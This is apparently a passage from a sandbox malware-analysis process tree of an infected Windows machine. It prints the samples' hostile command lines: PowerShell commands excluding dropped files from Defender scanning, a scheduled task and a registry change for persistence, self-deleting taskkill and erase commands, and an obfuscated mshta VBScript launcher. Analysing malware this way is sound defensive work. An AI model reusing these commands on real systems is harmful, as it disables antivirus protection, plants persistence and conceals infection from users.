                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe /usthree SUB=2fe3d428284ff9b385bc1c941892777b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "ugRrXBaN9Ln.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe" & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        taskkill /im "ugRrXBaN9Ln.exe" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\42ED.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\42ED.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\42ED.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\42ED.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\24D2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\24D2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C5A7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C5A7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:13056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:16356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DAF5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DAF5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:13904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E40E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E40E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:14160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 14160 -s 972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:12860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F100.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F100.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:15256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\12D1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\12D1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:16080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:15420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:15892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3ABD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3ABD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:16348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3ABD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\3ABD.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9D50.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9D50.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\玁獹獎玃獍獨獎獽獇獈獻獎獍獛獼\svchost.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\E45D.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:12908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\玁獹獎玃獍獨獎獽獇獈獻獎獍獛獼\svchost.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:13340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:13520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\ffa31ab8-93f7-4855-8da8-aa4702035f6a\AdvancedRun.exe" /SpecialRun 4101d8 13520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:14552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\E45D.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:15116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:15224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:15216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E45D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:15292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:13436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EAA7.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:13320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\AdvancedRun.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:13632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\AdvancedRun.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\6653bda5-f871-4a21-b2dd-d76878f449cc\AdvancedRun.exe" /SpecialRun 4101d8 13632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:14496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EAA7.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:15004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:15080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:15096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EAA7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:15088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F22A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F22A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1DB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1DB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\40E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\40E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbscRIpT: CLose ( CReatEobjECt ("wsCRiPt.sHElL" ). ruN ( "C:\Windows\system32\cmd.exe /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\40E.exe"" KRKEKIIi5B~CUi4.eXe && Start KRkEkIIi5B~Cui4.eXE -PShdg11EXki7U7jCV~QScNaUy3O6s0 & IF """" == """" for %h in ( ""C:\Users\Admin\AppData\Local\Temp\40E.exe"" ) do taskkill /f /im ""%~nXh"" " , 0, tRuE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:12996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
